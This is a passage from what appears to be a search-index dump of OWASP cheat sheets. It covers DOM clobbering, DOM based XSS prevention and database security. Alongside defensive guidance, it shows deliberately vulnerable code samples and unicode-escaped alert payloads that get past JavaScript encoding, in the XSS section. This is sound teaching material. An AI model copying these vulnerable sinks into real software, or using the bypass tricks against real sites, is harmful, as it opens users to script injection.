"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#12-use-unique-variable-names-in-production","title":"#12: Use Unique Variable Names In Production","text":"

Using unique variable names may help prevent naming collisions that could lead to accidental overwrites.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#13-use-object-oriented-programming-techniques-like-encapsulation","title":"#13: Use Object-oriented Programming Techniques like Encapsulation","text":"

Encapsulating variables and functions within objects or classes can help prevent them from being overwritten. By making them private, they cannot be accessed from outside the object, making them less prone to DOM Clobbering.
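
A minimal sketch using a class with a private field (the class name is illustrative):

 class Redirector {\n#target = '/profile/'; // private field: not reachable via window or document, so it cannot be clobbered\ngo() { location.assign(this.#target); }\n}\nnew Redirector().go();\n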

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html","title":"DOM based XSS Prevention Cheat Sheet","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

When looking at XSS (Cross-Site Scripting), there are three generally recognized forms of XSS: Reflected, Stored, and DOM based XSS.

The XSS Prevention Cheatsheet does an excellent job of addressing Reflected and Stored XSS. This cheatsheet addresses DOM (Document Object Model) based XSS and is an extension of (and assumes comprehension of) the XSS Prevention Cheatsheet.

In order to understand DOM based XSS, one needs to see the fundamental difference between Reflected and Stored XSS when compared to DOM based XSS. The primary difference is where the attack is injected into the application.

Reflected and Stored XSS are server side injection issues while DOM based XSS is a client (browser) side injection issue.

All of this code originates on the server, which means it is the application owner's responsibility to make it safe from XSS, regardless of the type of XSS flaw it is. Also, XSS attacks always execute in the browser.

The difference between Reflected/Stored XSS and DOM based XSS is where the attack is added or injected into the application. With Reflected/Stored the attack is injected into the application during server-side processing of requests where untrusted input is dynamically added to HTML. For DOM XSS, the attack is injected into the application during runtime in the client directly.

When a browser is rendering HTML and any other associated content like CSS or JavaScript, it identifies various rendering contexts for the different kinds of input and follows different rules for each context. A rendering context is associated with the parsing of HTML tags and their attributes.

For the purposes of this article, we refer to the HTML, HTML attribute, URL, and CSS contexts as subcontexts because each of these contexts can be reached and set within a JavaScript execution context.

In JavaScript code, the main context is JavaScript but with the right tags and context closing characters, an attacker can try to attack the other 4 contexts using equivalent JavaScript DOM methods.

The following is an example vulnerability which occurs in the JavaScript context and HTML subcontext:

 <script>\nvar x = '<%= taintedVar %>';\nvar d = document.createElement('div');\nd.innerHTML = x;\ndocument.body.appendChild(d);\n</script>\n

Let's look at the individual subcontexts of the execution context in turn.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-1-html-escape-then-javascript-escape-before-inserting-untrusted-data-into-html-subcontext-within-the-execution-context","title":"RULE #1 - HTML Escape then JavaScript Escape Before Inserting Untrusted Data into HTML Subcontext within the Execution Context","text":"

There are several methods and attributes which can be used to directly render HTML content within JavaScript. These methods constitute the HTML Subcontext within the Execution Context. If these methods are provided with untrusted input, then an XSS vulnerability could result. For example:

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#example-dangerous-html-methods","title":"Example Dangerous HTML Methods","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#attributes","title":"Attributes","text":"
 element.innerHTML = \"<HTML> Tags and markup\";\nelement.outerHTML = \"<HTML> Tags and markup\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#methods","title":"Methods","text":"
 document.write(\"<HTML> Tags and markup\");\ndocument.writeln(\"<HTML> Tags and markup\");\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline","title":"Guideline","text":"

To make dynamic updates to HTML in the DOM safe, we recommend:

  1. HTML encoding, and then
  2. JavaScript encoding all untrusted input, as shown in these examples:
 var ESAPI = require('node-esapi');\nelement.innerHTML = \"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\";\nelement.outerHTML = \"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\";\n
 var ESAPI = require('node-esapi');\ndocument.write(\"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\");\ndocument.writeln(\"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\");\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-2-javascript-escape-before-inserting-untrusted-data-into-html-attribute-subcontext-within-the-execution-context","title":"RULE #2 - JavaScript Escape Before Inserting Untrusted Data into HTML Attribute Subcontext within the Execution Context","text":"

The HTML attribute subcontext within the execution context is divergent from the standard encoding rules. This is because the rule to HTML attribute encode in an HTML attribute rendering context is necessary in order to mitigate attacks which try to exit out of an HTML attribute or try to add additional attributes which could lead to XSS.

When you are in a DOM execution context you only need to JavaScript encode HTML attributes which do not execute code (attributes other than event handler, CSS, and URL attributes).

For example, the general rule is to HTML Attribute encode untrusted data (data from the database, HTTP request, user, back-end system, etc.) placed in an HTML Attribute. This is the appropriate step to take when outputting data in a rendering context; however, using HTML Attribute encoding in an execution context will break the application's display of data.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#safe-but-broken-example","title":"SAFE but BROKEN example","text":"
 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"input\");\nx.setAttribute(\"name\", \"company_name\");\n// In the following line of code, companyName represents untrusted user input\n// The ESAPI.encoder().encodeForHTMLAttribute() is unnecessary and causes double-encoding\nx.setAttribute(\"value\", '<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTMLAttribute(companyName))%>');\nvar form1 = document.forms[0];\nform1.appendChild(x);\n

The problem is that if companyName had the value \"Johnson & Johnson\", what would be displayed in the input text field would be \"Johnson &amp; Johnson\". The appropriate encoding to use in the above case would be only JavaScript encoding, to prevent an attacker from closing out the single quotes and in-lining code, or escaping to HTML and opening a new script tag.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#safe-and-functionally-correct-example","title":"SAFE and FUNCTIONALLY CORRECT example","text":"
 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"input\");\nx.setAttribute(\"name\", \"company_name\");\nx.setAttribute(\"value\", '<%=ESAPI.encoder().encodeForJavascript(companyName)%>');\nvar form1 = document.forms[0];\nform1.appendChild(x);\n

It is important to note that when setting an HTML attribute which does not execute code, the value is set directly within the object attribute of the HTML element, so there is no concern about injection into the surrounding markup.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-3-be-careful-when-inserting-untrusted-data-into-the-event-handler-and-javascript-code-subcontexts-within-an-execution-context","title":"RULE #3 - Be Careful when Inserting Untrusted Data into the Event Handler and JavaScript code Subcontexts within an Execution Context","text":"

Putting dynamic data within JavaScript code is especially dangerous because JavaScript encoding has different semantics for JavaScript encoded data when compared to other encodings. In many cases, JavaScript encoding does not stop attacks within an execution context. For example, a JavaScript encoded string will execute even though it is JavaScript encoded.

Therefore, the primary recommendation is to avoid including untrusted data in this context. If you must, the following examples describe some approaches that do and do not work.

var x = document.createElement(\"a\");\nx.href=\"#\";\n// In the line of code below, the encoded data on the right (the second argument to setAttribute)\n// is an example of untrusted data that was properly JavaScript encoded but still executes.\nx.setAttribute(\"onclick\", \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0032\\u0032\\u0029\");\nvar y = document.createTextNode(\"Click To Test\");\nx.appendChild(y);\ndocument.body.appendChild(x);\n

The setAttribute(name_string,value_string) method is dangerous because it implicitly coerces the value_string into the DOM attribute datatype of name_string.

In the case above, the attribute name is a JavaScript event handler, so the attribute value is implicitly converted to JavaScript code and evaluated. As a result, JavaScript encoding does not mitigate against DOM based XSS here.

Other JavaScript methods which take code as a string will have a similar problem as outlined above (setTimeout, setInterval, new Function, etc.). This is in stark contrast to JavaScript encoding in the event handler attribute of an HTML tag (HTML parser), where JavaScript encoding mitigates against XSS.

<!-- Does NOT work  -->\n<a id=\"bb\" href=\"#\" onclick=\"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\"> Test Me</a>\n

An alternative to using Element.setAttribute(...) to set DOM attributes is to set the attribute directly. Directly setting event handler attributes will allow JavaScript encoding to mitigate against DOM based XSS. Please note, it is always dangerous design to put untrusted data directly into a command execution context.

<a id=\"bb\" href=\"#\"> Test Me</a>\n
//The following does NOT work because the event handler is being set to a string.\n//\"alert(7)\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onclick = \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0037\\u0029\";\n\n//The following does NOT work because the event handler is being set to a string.\ndocument.getElementById(\"bb\").onmouseover = \"testIt\";\n\n//The following does NOT work because of the encoded \"(\" and \")\".\n//\"alert(77)\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onmouseover = \\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0037\\u0037\\u0029;\n\n//The following does NOT work because of the encoded \";\".\n//\"testIt;testIt\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onmouseover = \\u0074\\u0065\\u0073\\u0074\\u0049\\u0074\\u003b\\u0074\\u0065\\u0073\n\\u0074\\u0049\\u0074;\n\n//The following DOES WORK because the encoded value is a valid variable name or function reference.\n//\"testIt\" is JavaScript encoded\ndocument.getElementById(\"bb\").onmouseover = \\u0074\\u0065\\u0073\\u0074\\u0049\\u0074;\n\nfunction testIt() {\nalert(\"I was called.\");\n}\n

There are other places in JavaScript where JavaScript encoding is accepted as valid executable code.

 for(var \\u0062=0; \\u0062 < 10; \\u0062++){\n\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\n.\\u0077\\u0072\\u0069\\u0074\\u0065\\u006c\\u006e\n(\"\\u0048\\u0065\\u006c\\u006c\\u006f\\u0020\\u0057\\u006f\\u0072\\u006c\\u0064\");\n}\n\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\n.\\u0065\\u0076\\u0061\\u006c\n\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\n.\\u0077\\u0072\\u0069\\u0074\\u0065(111111111);\n

or

 var s = \"\\u0065\\u0076\\u0061\\u006c\";\nvar t = \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0031\\u0029\";\nwindow[s](t);\n

Because JavaScript is based on an international standard (ECMAScript), JavaScript encoding enables the support of international characters in programming constructs and variables in addition to alternate string representations (string escapes).

However the opposite is the case with HTML encoding. HTML tag elements are well defined and do not support alternate representations of the same tag. So HTML encoding cannot be used to allow the developer to have alternate representations of the <a> tag for example.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#html-encodings-disarming-nature","title":"HTML Encoding's Disarming Nature","text":"

In general, HTML encoding serves to disarm HTML tags which are placed in HTML and HTML attribute contexts. Working example (no HTML encoding):

<a href=\"...\" >\n

Normally encoded example (Does Not Work \u2013 DNW):

&#x3c;a href=... &#x3e;\n

HTML encoded example to highlight a fundamental difference with JavaScript encoded values (DNW):

<&#x61; href=...>\n

If HTML encoding followed the same semantics as JavaScript encoding, the line above could possibly have worked to render a link. This difference makes JavaScript encoding a less viable weapon in our fight against XSS.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-4-javascript-escape-before-inserting-untrusted-data-into-the-css-attribute-subcontext-within-the-execution-context","title":"RULE #4 - JavaScript Escape Before Inserting Untrusted Data into the CSS Attribute Subcontext within the Execution Context","text":"

Normally executing JavaScript from a CSS context required either passing javascript:attackCode() to the CSS url() method or invoking the CSS expression() method passing JavaScript code to be directly executed.

From my experience, calling the expression() function from an execution context (JavaScript) has been disabled. In order to mitigate against the CSS url() method, ensure that you are URL encoding the data passed to the CSS url() method.

var ESAPI = require('node-esapi');\ndocument.body.style.backgroundImage = \"url(<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(companyName))%>)\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-5-url-escape-then-javascript-escape-before-inserting-untrusted-data-into-url-attribute-subcontext-within-the-execution-context","title":"RULE #5 - URL Escape then JavaScript Escape Before Inserting Untrusted Data into URL Attribute Subcontext within the Execution Context","text":"

The logic which parses URLs in both execution and rendering contexts looks to be the same. Therefore there is little change in the encoding rules for URL attributes in an execution (DOM) context.

var ESAPI = require('node-esapi');\nvar x = document.createElement(\"a\");\nx.setAttribute(\"href\", '<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(userRelativePath))%>');\nvar y = document.createTextNode(\"Click Me To Test\");\nx.appendChild(y);\ndocument.body.appendChild(x);\n

If you utilize fully qualified URLs then this will break the links as the colon in the protocol identifier (http: or javascript:) will be URL encoded preventing the http and javascript protocols from being invoked.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-6-populate-the-dom-using-safe-javascript-functions-or-properties","title":"RULE #6 - Populate the DOM using safe JavaScript functions or properties","text":"

The most fundamental safe way to populate the DOM with untrusted data is to use the safe assignment property textContent.

Here is an example of safe usage.

<script>\nelement.textContent = untrustedData;  //does not execute code\n</script>\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-7-fixing-dom-cross-site-scripting-vulnerabilities","title":"RULE #7 - Fixing DOM Cross-site Scripting Vulnerabilities","text":"

The best way to fix DOM based cross-site scripting is to use the right output method (sink). For example, if you want to use user input to write to a div tag element, don't use innerHTML; instead use innerText or textContent. This will solve the problem, and it is the right way to remediate DOM based XSS vulnerabilities.

It is always a bad idea to use user-controlled input in dangerous sinks such as eval(). 99% of the time it is an indication of bad or lazy programming practice, so simply don't do it instead of trying to sanitize the input.

Finally, to fix the problem in our initial code, instead of trying to encode the output correctly, which is a hassle and can easily go wrong, we simply use element.textContent to write the content, like this:

<b>Current URL:</b> <span id=\"contentholder\"></span>\n...\n<script>\ndocument.getElementById(\"contentholder\").textContent = document.baseURI;\n</script>\n

It does the same thing but this time it is not vulnerable to DOM based cross-site scripting vulnerabilities.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guidelines-for-developing-secure-applications-utilizing-javascript","title":"Guidelines for Developing Secure Applications Utilizing JavaScript","text":"

DOM based XSS is extremely difficult to mitigate against because of its large attack surface and lack of standardization across browsers.

The guidelines below are an attempt to provide guidance to developers when developing Web based JavaScript applications (Web 2.0) such that they can avoid XSS.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-1-untrusted-data-should-only-be-treated-as-displayable-text","title":"GUIDELINE #1 - Untrusted data should only be treated as displayable text","text":"

Avoid treating untrusted data as code or markup within JavaScript code.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-2-always-javascript-encode-and-delimit-untrusted-data-as-quoted-strings-when-entering-the-application-when-building-templated-javascript","title":"GUIDELINE #2 - Always JavaScript encode and delimit untrusted data as quoted strings when entering the application when building templated JavaScript","text":"

Always JavaScript encode and delimit untrusted data as quoted strings when entering the application as illustrated in the following example.

var x = \"<%= Encode.forJavaScript(untrustedData) %>\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-3-use-documentcreateelement-elementsetattributevalue-elementappendchild-and-similar-to-build-dynamic-interfaces","title":"GUIDELINE #3 - Use document.createElement(\"...\"), element.setAttribute(\"...\",\"value\"), element.appendChild(...) and similar to build dynamic interfaces","text":"

document.createElement(\"...\"), element.setAttribute(\"...\",\"value\"), element.appendChild(...) and similar are safe ways to build dynamic interfaces.

Please note, element.setAttribute is only safe for a limited number of attributes.

Dangerous attributes include any attribute that is a command execution context, such as onclick or onblur.

Examples of safe attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-4-avoid-sending-untrusted-data-into-html-rendering-methods","title":"GUIDELINE #4 - Avoid sending untrusted data into HTML rendering methods","text":"

Avoid populating the following methods with untrusted data.

  1. element.innerHTML = \"...\";
  2. element.outerHTML = \"...\";
  3. document.write(...);
  4. document.writeln(...);
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-5-avoid-the-numerous-methods-which-implicitly-eval-data-passed-to-it","title":"GUIDELINE #5 - Avoid the numerous methods which implicitly eval() data passed to it","text":"

There are numerous methods which implicitly eval() data passed to them that must be avoided.

Make sure that any untrusted data passed to these methods is:

  1. Delimited with string delimiters
  2. Enclosed within a closure or JavaScript encoded to N-levels based on usage
  3. Wrapped in a custom function.

Be sure to follow step 3 above, to make sure that the untrusted data is not sent to dangerous methods within the custom function, or handle it by adding an extra layer of encoding.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#utilizing-an-enclosure-as-suggested-by-gaz","title":"Utilizing an Enclosure (as suggested by Gaz)","text":"

The example that follows illustrates using closures to avoid double JavaScript encoding.

 var ESAPI = require('node-esapi');\nsetTimeout((function(param) { return function() {\ncustomFunction(param);\n}\n})(\"<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>\"), y);\n

The other alternative is using N-levels of encoding.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#n-levels-of-encoding","title":"N-Levels of Encoding","text":"

If your code looked like the following, you would need to only double JavaScript encode input data.

setTimeout(\"customFunction('<%=doubleJavaScriptEncodedData%>', y)\");\nfunction customFunction (firstName, lastName)\nalert(\"Hello\" + firstName + \" \" + lastNam);\n}\n

The doubleJavaScriptEncodedData has its first layer of JavaScript encoding reversed (upon execution) in the single quotes.

Then the implicit eval of setTimeout reverses another layer of JavaScript encoding to pass the correct value to customFunction.

The reason why you only need to double JavaScript encode is that the customFunction function did not itself pass the input to another method which implicitly or explicitly called eval. If firstName was passed to another JavaScript method which implicitly or explicitly called eval() then <%=doubleJavaScriptEncodedData%> above would need to be changed to <%=tripleJavaScriptEncodedData%>.

An important implementation note is that if the JavaScript code tries to utilize the double or triple encoded data in string comparisons, the value may be interpreted as different values based on the number of evals() the data has passed through before being passed to the if comparison and the number of times the value was JavaScript encoded.

If A is double JavaScript encoded then the following if check will return false.

 var x = \"doubleJavaScriptEncodedA\";  //\\u005c\\u0075\\u0030\\u0030\\u0034\\u0031\nif (x == \"A\") {\nalert(\"x is A\");\n} else if (x == \"\\u0041\") {\nalert(\"This is what pops\");\n}\n

This brings up an interesting design point. Ideally, the correct way to apply encoding and avoid the problem stated above is to server-side encode for the output context where data is introduced into the application.

Then client-side encode (using a JavaScript encoding library such as node-esapi) for the individual subcontext (DOM methods) which untrusted data is passed to.

Here are some examples of how they are used:

//server-side encoding\nvar ESAPI = require('node-esapi');\nvar input = \"<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>\";\n
//HTML encoding is happening in JavaScript\nvar ESAPI = require('node-esapi');\ndocument.writeln(ESAPI.encoder().encodeForHTML(input));\n

One option is to utilize ECMAScript 5 immutable properties in the JavaScript library. Another option, provided by Gaz (Gareth), is to use a specific code construct to limit mutability with anonymous closures.

An example follows:

function escapeHTML(str) {\nstr = str + \"\";\nvar out = \"\";\nfor(var i=0; i<str.length; i++) {\nif(str[i] === '<') {\nout += '&lt;';\n} else if(str[i] === '>') {\nout += '&gt;';\n} else if(str[i] === \"'\") {\nout += '&#39;';\n} else if(str[i] === '\"') {\nout += '&quot;';\n} else {\nout += str[i];\n}\n}\nreturn out;\n}\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-6-use-untrusted-data-on-only-the-right-side-of-an-expression","title":"GUIDELINE #6 - Use untrusted data on only the right side of an expression","text":"

Use untrusted data on only the right side of an expression, especially data that looks like code and may be passed to the application (e.g., location and eval()).

window[userDataOnLeftSide] = \"userDataOnRightSide\";\n

Using untrusted user data on the left side of the expression allows an attacker to subvert internal and external attributes of the window object, whereas using user input on the right side of the expression doesn't allow direct manipulation.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-7-when-url-encoding-in-dom-be-aware-of-character-set-issues","title":"GUIDELINE #7 - When URL encoding in DOM be aware of character set issues","text":"

When URL encoding in the DOM, be aware of character set issues, as the character set in the JavaScript DOM is not clearly defined (Mike Samuel).

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-8-limit-access-to-object-properties-when-using-objectx-accessors","title":"GUIDELINE #8 - Limit access to object properties when using object[x] accessors","text":"

Limit access to object properties when using object[x] accessors (Mike Samuel). In other words, add a level of indirection between untrusted input and specified object properties.

Here is an example of the problem using map types:

var myMapType = {};\nmyMapType[<%=untrustedData%>] = \"moreUntrustedData\";\n

The developer writing the code above was trying to add additional keyed elements to the myMapType object. However, this could be used by an attacker to subvert internal and external attributes of the myMapType object.

A better approach would be to use the following:

if (untrustedData === 'location') {\nmyMapType.location = \"moreUntrustedData\";\n}\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-9-run-your-javascript-in-a-ecmascript-5-canopy-or-sandbox","title":"GUIDELINE #9 - Run your JavaScript in a ECMAScript 5 canopy or sandbox","text":"

Run your JavaScript in an ECMAScript 5 canopy or sandbox to make it harder for your JavaScript API to be compromised (Gareth Heyes and John Stevens).

Examples of some JavaScript sandbox / sanitizers:

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-10-dont-eval-json-to-convert-it-to-native-javascript-objects","title":"GUIDELINE #10 - Don't eval() JSON to convert it to native JavaScript objects","text":"

Don't eval() JSON to convert it to native JavaScript objects. Instead use JSON.parse() to parse it and JSON.stringify() to serialize it (Chris Schmidt).
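
For example (the payload is illustrative):

 const untrustedJson = '{\"name\":\"example\"}';\nconst data = JSON.parse(untrustedJson); // throws on malformed input and never executes code\n// const bad = eval('(' + untrustedJson + ')'); // dangerous: may execute attacker-controlled code\n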

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#common-problems-associated-with-mitigating-dom-based-xss","title":"Common Problems Associated with Mitigating DOM Based XSS","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#complex-contexts","title":"Complex Contexts","text":"

In many cases the context isn't always straightforward to discern.

<a href=\"javascript:myFunction('<%=untrustedData%>', 'test');\">Click Me</a>\n ...\n<script>\nFunction myFunction (url,name) {\nwindow.location = url;\n}\n</script>\n

In the above example, untrusted data started in the rendering URL context (href attribute of an a tag) then changed to a JavaScript execution context (javascript: protocol handler) which passed the untrusted data to an execution URL subcontext (window.location of myFunction).

Because the data was introduced in JavaScript code and passed to a URL subcontext the appropriate server-side encoding would be the following:

<a href=\"javascript:myFunction('<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(untrustedData)) %>', 'test');\">\nClick Me</a>\n ...\n

Or if you were using ECMAScript 5 with an immutable JavaScript client-side encoding library, you could do the following:

<!-- server side URL encoding has been removed.  Now only JavaScript encoding on server side. -->\n<a href=\"javascript:myFunction('<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>', 'test');\">Click Me</a>\n ...\n<script>\nfunction myFunction (url,name) {\nvar encodedURL = ESAPI.encoder().encodeForURL(url);  //URL encoding using client-side scripts\nwindow.location = encodedURL;\n}\n</script>\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#inconsistencies-of-encoding-libraries","title":"Inconsistencies of Encoding Libraries","text":"

There are a number of open source encoding libraries out there:

  1. OWASP ESAPI
  2. OWASP Java Encoder
  3. Apache Commons Text StringEscapeUtils, which replaces the one from Apache Commons Lang3
  4. Jtidy
  5. Your company's custom implementation.

Some work on a block list while others ignore important characters like \"<\" and \">\".

Java Encoder is an active project providing support for HTML, CSS and JavaScript encoding.

ESAPI is one of the few which works on an allow list and encodes all non-alphanumeric characters. It is important to use an encoding library that understands which characters can be used to exploit vulnerabilities in their respective contexts. Misconceptions abound related to the proper encoding that is required.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#encoding-misconceptions","title":"Encoding Misconceptions","text":"

Many security training curriculums and papers advocate the blind usage of HTML encoding to resolve XSS.

This logically seems to be prudent advice as the JavaScript parser does not understand HTML encoding.

However, if the pages returned from your web application utilize a content type of text/xhtml or the file type extension of *.xhtml then HTML encoding may not work to mitigate against XSS.

For example:

<script>\n&#x61;lert(1);\n</script>\n

The HTML encoded value above is still executable. If that isn't enough to keep in mind, you have to remember that encodings are lost when you retrieve them using the value attribute of a DOM element.

Let's look at the sample page and script:

<form name=\"myForm\" ...>\n  <input type=\"text\" name=\"lName\" value=\"<%=ESAPI.encoder().encodeForHTML(last_name)%>\">\n ...\n</form>\n<script>\nvar x = document.myForm.lName.value;  //when the value is retrieved the encoding is reversed\ndocument.writeln(x);  //any code passed into lName is now executable.\n</script>\n

Finally there is the problem that certain methods in JavaScript which are usually safe can be unsafe in certain contexts.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#usually-safe-methods","title":"Usually Safe Methods","text":"

One example of an attribute which is thought to be safe is innerText.

Some papers or guides advocate its use as an alternative to innerHTML to mitigate against XSS in innerHTML. However, depending on the tag to which innerText is applied, code can be executed.

<script>\nvar tag = document.createElement(\"script\");\ntag.innerText = \"<%=untrustedData%>\";  //executes code\n</script>\n

The innerText feature was originally introduced by Internet Explorer, and was formally specified in the HTML standard in 2016 after being adopted by all major browser vendors.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#detect-dom-xss-using-variant-analysis","title":"Detect DOM XSS using variant analysis","text":"

Vulnerable code:

<script>\nvar x = location.hash.split(\"#\")[1];\ndocument.write(x);\n</script>\n

A Semgrep rule to identify the above DOM XSS: link.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html","title":"Database Security Cheat Sheet","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance on securely configuring and using SQL and NoSQL databases. It is intended to be used by application developers when they are responsible for managing the databases, in the absence of a dedicated database administrator (DBA). For details about protecting against SQL Injection attacks, see the SQL Injection Prevention Cheat Sheet.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#connecting-to-the-database","title":"Connecting to the Database","text":"

The backend database used by the application should be isolated as much as possible, in order to prevent malicious or undesirable users from being able to connect to it. Exactly how this is achieved will depend on the system and network architecture. The following options could be used to protect it:

Similar protection should be implemented to protect any web-based management tools used with the database, such as phpMyAdmin.

When an application is running on an untrusted system (such as a thick-client), it should always connect to the backend through an API that can enforce appropriate access control and restrictions. Direct connections should never be made from a thick client to the backend database.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#transport-layer-protection","title":"Transport Layer Protection","text":"

Most databases will allow unencrypted network connections in their default configurations. Although some will encrypt the initial authentication (such as Microsoft SQL Server), the rest of the traffic will be unencrypted, meaning that all kinds of sensitive information will be sent across the network in clear text. The following steps should be taken to prevent unencrypted traffic:

The Transport Layer Protection and TLS Cipher String Cheat Sheets contain further guidance on securely configuring TLS.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#authentication","title":"Authentication","text":"

The database should be configured to always require authentication, including connections from the local server. Database accounts should be:

As with any system that has its own user accounts, the usual account management processes should be followed, including:

For Microsoft SQL Server, consider the use of Windows or Integrated-Authentication, which uses existing Windows accounts rather than SQL Server accounts. This also removes the requirement to store credentials in the application, as it will connect using the credentials of the Windows user it is running under. The Windows Native Authentication Plugin provides similar functionality for MySQL.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#storing-database-credentials","title":"Storing Database Credentials","text":"

Database credentials should never be stored in the application source code, especially if they are unencrypted. Instead, they should be stored in a configuration file that:

Where possible, these credentials should also be encrypted or otherwise protected using built-in functionality, such as the web.config encryption available in ASP.NET.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#permissions","title":"Permissions","text":"

The permissions assigned to database user accounts should be based on the principle of least privilege (i.e., the accounts should only have the minimal permissions required for the application to function). This can be applied at a number of increasingly granular levels depending on the functionality available in the database. The following steps should be applicable to all environments:

For more security-critical applications, it is possible to apply permissions at more granular levels, including:

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#database-configuration-and-hardening","title":"Database Configuration and Hardening","text":"

The underlying operating system for the database server should be hardened in the same way as any other server, based on a secure baseline such as the CIS Benchmarks or the Microsoft Security Baselines.

The database application should also be properly configured and hardened. The following principles should apply to any database application and platform:

The following sections give some further recommendations for specific database software, in addition to the more general recommendations given above.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#microsoft-sql-server","title":"Microsoft SQL Server","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#mysql-and-mariadb","title":"MySQL and MariaDB","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#postgresql","title":"PostgreSQL","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#mongodb","title":"MongoDB","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#redis","title":"Redis","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html","title":"Denial of Service Cheat Sheet","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#introduction","title":"Introduction","text":"

